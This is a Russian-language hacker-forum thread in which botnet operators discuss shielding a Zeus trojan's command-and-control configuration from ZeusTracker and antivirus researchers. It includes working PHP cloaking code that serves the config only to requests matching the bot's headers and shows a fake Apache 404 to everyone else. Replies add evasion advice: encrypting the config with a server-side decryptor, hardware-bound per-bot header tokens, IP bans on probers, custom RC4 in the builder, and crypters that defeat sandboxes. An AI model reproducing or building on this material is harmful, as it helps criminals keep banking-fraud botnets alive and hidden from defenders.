security zeus config

[j0ker13]

чтож... думал куда запостить чтоб оценили и помогли)
для всех проблема всякие зеустрекеры и прочие кто портит жизнь зевсу.
на счет закрыть доступ по ипам от зевстрекера - нашли кто хотел.
я предлагаю закрывать конфиг от всех кроме зевса
www.w/zeus/pizdec/cfg.bin -> eto propisano v konfige zevsa
www.w/zeus/th/ee -> tut konfig na samom dele
недолго изучив логи апача получилось

Спойлер: 30

<?php
$version="1.2.4.2";
$file_name="../../zeus/th/ee";

$p404 = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /zeus/pizdec/cfg.bin was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.37 Server at 130.43.232.72.static.reverse.layeredtech.com Port 80</ADDRESS>
</BODY></html>';

function good(){
  global $file_name;
	header ("Content-type: application/octet-stream;charset=windows-1251");
	header ("Content-Length: ".filesize($file_name)); 
	header ("Content-Disposition: attachment; filename=cfg.bin");
	header ("Pragma: no-cache");
	readfile($file_name);
}

function bad(){
	global $a,$p404;
	echo $p404;
	//logs($a."access denied");
	die();
}

if (($_SERVER['HTTP_ACCEPT']=='*/*') && ($_SERVER['HTTP_ACCEPT_LANGUAGE']=="") && ($_SERVER['HTTP_REFERER']=="") && ($_SERVER['QUERY_STRING']=="") && ($_SERVER['HTTP_ACCEPT_CHARSET']=="") && ($_SERVER['HTTP_ACCEPT_ENCODING']=="") && ($_SERVER['HTTP_CONNECTION']=="")){
	switch($version){
  case "1.2.4.2":
  if(strpos("Mozilla/4.0",$_SERVER['HTTP_USER_AGENT'])!=-1){
  	good();
  	//logs($a."send ok");
  }else{
  	bad();
  }
	break;	
	}
}else{
	bad();
}
?>

немного поясню кто не понял)
этот фаил - cfg.bin(прописанныи в зевсе ) в паре с .хтаццесс

AddType application/x-httpd-php .bin

дает ему выполнится как скрипту.
дальше идет проверка по заголовкам.
код выше - версия зевса 1.2.4.2. тестился на нем(в принципе не составит труда сделать и под другие версии)
попытаясь скачать через браузер(думаю в большинстве случаев) - обломится.
если зевс его запросит - получит)
+/- выскажите)

 

[TrueUser]

+/- выскажите

Да ты прав, браузер обломиться, а эмулятор зевса нет. Ты бы занялся вопросом и изучил принцип действия зевс трекера - бесценный опыт для его обхода, НО, если учесть что на хостинге (а не все юзают антиобузники поверь) обычно стоят антивирусы, которые тупо палят файл конфига, тот самый бинарник.
ИТОГО:
Если тебя прет от этой темы рекомендую:
1. Узнать как зевстрекер чекает наличие конфига на серваке (с какими данными приходит).
2. Написать криптор и онлайн декриптор файла конфига на пхп, чтобы выкладывать на сервак закриптованную версию, а в функцию выдачи файла встроить декриптор.
3.

readfile($file_name);

по умолчанию эта функция работает в режиме чтения текстовых файлов. По моему флагами можно заставить ее читать бинарники. Это не так уж важно при прямом выводе, но при обработке декриптором может съыграть существенную роль.
4. Если не хочешь чтоб всю твою технологию спалили (ну даже пара часов трудов не стоят того чтобы о них знал каждый балбес) прикрывай свой сорц хайдом нормальным (SPOILER=50)(/SPOILER). Те кто смогут что то подсказать однозначно прочтут, а у кого меньше те и не посоветуют толком ничего.

P.S. Удачи :crazy:

 

[j0ker13]

sps. vopros byl v tom chto ya i ne dumal o emulyatore zeusa) a raschityval chto komanda zeustrackera delaet vse ruchkami. hzhz
ne ponyal smysl crypta - konfig i tak kriptuetsya vet')

 

[TrueUser]

ne ponyal smysl crypta - konfig i tak kriptuetsya vet')

Содержимое конкретное файла конфига криптуется ключем да, но странный бинарник вызывает много подозрений - я как то на одном хостинге погорел даже без админки только тупо с конфигом
ЧТо и как криптить конкретно не знаю... суть в том что надо скрывать как то.

 

[AHTOLLlKA]

крипт при хранение и декрипт при выдаче это тру =)
а еще бы в идеале можно было бы при билде зевса делать ему нужный тебе или рандомный юзерагент, при котором только бы выдавался конфиг..и по алгоритму бы он менялся раз в сутки или типо того..

 

[TrueUser]

а еще бы в идеале можно было бы при билде зевса делать ему нужный тебе или рандомный юзерагент, при котором только бы выдавался конфиг..и по алгоритму бы он менялся раз в сутки или типо того..

Обычно для этого юзается дополнительное поле в заголовке HTTP идентифицирующее бота.
НО для того чтобы свалить от эмуля зевстрекера юзается технология плавающих меток в этом поле, зависящих конкретно от железа, рефа установки и пр. тут точно все обломаются, но... это все делать надо руками на своем личном софте. Лично для меня зевс - рокет лаунчер в трамвае

 

[j0ker13]

Содержимое конкретное файла конфига криптуется ключем да, но странный бинарник вызывает много подозрений - я как то на одном хостинге погорел даже без админки только тупо с конфигом smile.gif
ЧТо и как криптить конкретно не знаю... суть в том что надо скрывать как то.

a chto meshaet pereimenovat' konfig dopustim v index.php ili readme.txt?)

Обычно для этого юзается дополнительное поле в заголовке HTTP идентифицирующее бота.
НО для того чтобы свалить от эмуля зевстрекера юзается технология плавающих меток в этом поле, зависящих конкретно от железа, рефа установки и пр. тут точно все обломаются, но... это все делать надо руками на своем личном софте. Лично для меня зевс - рокет лаунчер в трамвае smile.gif

soglasen) legche dorabotat' svoi proekt imeya ishodniki chem chuzhoi bez nih)
no po krainei mere tut oblomayutsya vse, kto zahochet slit' tvoi konfig dlya zlyh deyanii)

 

[AHTOLLlKA]

a chto meshaet pereimenovat' konfig dopustim v index.php ili readme.txt?)

да то что например тот же McAfee палит конфиг... и другие может тоже..

 

[j0ker13]

yasno. nu togda da - toka shifrovanie)

 

[TrueUser]

Еще, например, можно сделать фишку с рандомным полем, то есть бот должен при обращении с одного ип каждый раз выставлять уникальное рандомное поле, если происходит заход с одного ип с одним и тем параметром - ип в бан, ибо там кто то решил поковыряться в твоих скриптах

 

[wutang]

Еще, например, можно сделать фишку с рандомным полем, то есть бот должен при обращении с одного ип каждый раз выставлять уникальное рандомное поле, если происходит заход с одного ип с одним и тем параметром - ип в бан, ибо там кто то решил поковыряться в твоих скриптах smile.gif

на больших ботнетах нагрузка на серв возрастет :crazy:

 

[TrueUser]

на больших ботнетах нагрузка на серв возрастет

На больших ботнетах так или иначе хост\домен заколбасят. Будет виден конфиг или админка или не будет - не важно. У кого есть средства на псевдоантиобузный хостинг париться с такими скриптами не будет

P.S. А еще все выше сказано для уникального софта, зевс тут уже не катит...

 

[j0ker13]

P.S. А еще все выше сказано для уникального софта, зевс тут уже не катит...

nu pochemu eto?) revers s disassemblerom nikto ne otmenyal

 

[TrueUser]

Все равно эти пляски с бубном... к чему... Если сможешь переделать зевса, то проще написать что то свое - не такое палящееся

 

[KraZz]

Ну, детект у них тупо элементарно прост
Алго декриптования вы сами им(аверам) и дали, релизя тупо билды(хотя они могут и купить сами или даже заказать("эпидемию") чтобы сделали, когда продажи их гавночуда падают %)), просто потом объявят что они первые решение нашли и ТОЛЬКО их AV лечит этого засранчика..)
Тут первый детек идет по самой структуре админки(у Eleonore кстати тоже)
Потом если был найден сам бот(или тупо сразу с exe начинают, присланного на какой-нибудь virustotal) – его запускают в "песочнице" и сразу в считанные секунды получают нужные данные
Там есть данные, где храниццо конфиг, ну вернее его линк и ключег, который его декриптует, ну а дальше сигнатурный поиск по ключам и смещениям.. вот и весь детект
А конфиг аверам нужен для того чтобы пресечь живучесть зевса. А именно AdvancedConfigs..
Решений как обломить аверов вагон и тележка с очередью. самое простое - это изменить полностью админку (по сути сделать новую свою)
пропадчить в билдере ("шаблон" бота) алго шифрования на свой и в гейте заменить на свой декриптор(RC4), ну это для среднего уровня на день дрочева – ИМХО
А для тех, кто настраивает ботнет зевса со скидками в канун праздничков, наверно на час %)))
ЗЫ: ну естес-но юзать нормальный криптор, который не только virustotal апёбывает, но и эмулятор с писочницей тоже имеет!
ЗЫЫ: все естес-но ИМХО, а как там у них в реале я хз..

 

[TrueUser]

А для тех, кто настраивает ботнет зевса со скидками в канун праздничков, наверно на час %)))

К слову об сервисах по установке паблика за копейки подросткам - давайте не будем развращать еще сильнее их и без того развращенные умы .

 

[KraZz]

Ну, это НЕ в качестве бравирования цитата написана в отдельных фразах истины нет! %))
Я лишь намекнул на то, что это "чудо" настроит(по умолчанию) за копейки, а потом когда чел этот ботнет немного "раскрутит" у него его СПИЗДЯТ(да-да, тут без вариантов, ну или как минимум чтобы не напрягацца зальют шел и будут его доить, а этот чел(хозяин ботнета) будет его удобрять, пропалывать, вскапывать и ГУАНО ОТЧЕТЫ парсить %)))
А тут уже не копейки будут.. так, что про конфиг это так сказать дело десятое уже.. чич-то для притчи написано было
Но это даже не только к сервисам относится, ведь большой процент юзающих даже тупо путь не меняют, все по умолчанию оставляют.. вот такие на трекерах и торчат постоянно, заходи и забирай ботов.. - ИМХО
ЗЫ: кому действительно надо, тот асилит про что я написал, без всяких там объяснений